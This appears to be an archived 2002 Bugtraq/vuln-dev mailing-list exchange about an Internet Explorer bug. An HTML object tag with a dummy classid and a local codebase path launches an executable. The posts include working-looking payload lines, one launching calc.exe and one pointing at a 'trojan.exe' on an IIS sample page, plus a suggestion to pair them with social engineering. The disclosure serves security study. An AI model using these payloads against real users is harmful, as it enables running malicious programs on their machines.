http://server/quickstart/aspplus/samples/webforms/ctrlref/htmlctrl/HtmlInput File/VB/HtmlInputFile1.aspx + <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/temp/trojan.exe"></object> Probably with this example [careless combination] and social engineering, a silly IIS box manager it affects ... in another way it is not checked since I have not had time for the moment. Best regards CT www.heinekenteam.com I wanted to install Opera in my Windows box, but... Luciano Pavarotti ate up. ----- Original Message ----- From: "Steve" <steveat_private> To: <vuln-devat_private>; <bugtraqat_private> Sent: Wednesday, March 06, 2002 8:54 PM Subject: IExplorer > I know we have seen many websites already showing this as a problem. > > > <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" > codebase="c:/winnt/system32/calc.exe"></object> > <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" > codebase="c:/windows/system32/calc.exe"></object> > > Of course, this is part of the HTML that is causing this problem, but I was > unable to reformat the string to cause any substantial privilege escalation > in the syste, via this bug.
This archive was generated by hypermail 2b30 : Wed Mar 06 2002 - 21:40:20 PST